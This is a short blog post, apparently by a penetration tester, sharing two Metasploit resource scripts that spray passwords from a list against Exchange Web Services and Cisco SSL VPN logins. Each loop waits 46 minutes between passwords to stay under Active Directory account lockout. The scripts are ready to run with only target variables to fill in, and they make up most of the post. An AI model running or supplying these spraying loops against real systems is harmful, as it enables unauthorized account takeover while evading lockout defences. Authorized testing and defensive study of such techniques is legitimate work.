As is common with most penetration tests, my initial footholds typically come from public facing authentication portals such as Webmail and VPNs. Most of these portals are tied to the organization's Active Directory and subject to account lockout.

While these modules and vectors (EWS/VPN) are nothing new, looping them with built in sleep timers allows you to 'set it and forget it' while playing nicely with account lockout policies. In addition, the Cisco SSL module works well (thanks JClaudius) compared to older/non-maintained tools.

MSF.rc

Simply replace the $VARIABLES, call Metasploit and reference the RC file to get going. Spawn it in a SCREEN session, detach and wait for Bob to become your uncle.

msfconsole -r <resource-script.rc>

Exchange Web Service (Autobrute)

ews-autobrute.rc

<ruby>
run_single("spool ewsbrute-loop.txt")
run_single("use auxiliary/scanner/http/owa_ews_login")
run_single("set RHOSTS $TARGET")
run_single("set RPORT 443")
run_single("set AD_DOMAIN $DOMAIN")
run_single("set USER_FILE flast.txt")
run_single("set verbose true")
File.open("passwords.txt", "r") do |file_handle|
  file_handle.each_line do |pass|
    run_single(%Q[set PASSWORD #{pass}])
    run_single("exploit")
    sleep 2760 #Sleep for 46 minutes to make AD happy
  end
end
</ruby>

Cisco SSL VPN (Autobrute)

cisco_ssl_autobrute.rc

<ruby>
run_single("spool vpn-brute-log.txt")
run_single("use auxiliary/scanner/http/cisco_ssl_vpn")
run_single("set GROUP $GROUPID")
run_single("set RHOSTS $TARGET")
run_single("set RPORT 443")
run_single("set USER_FILE Users")
run_single("set verbose true")
File.open("owa-brute.txt", "r") do |file_handle|
  file_handle.each_line do |pass|
    run_single(%Q[set PASSWORD #{pass}])
    run_single("exploit")
    sleep 2760 #Sleep for 46 minutes to make AD happy
  end
end
</ruby>

I've added these RC files to my scripts folder on Github. Got other creative ways to make Metasploit more effective? Hit me up on the Twitter.

-Travis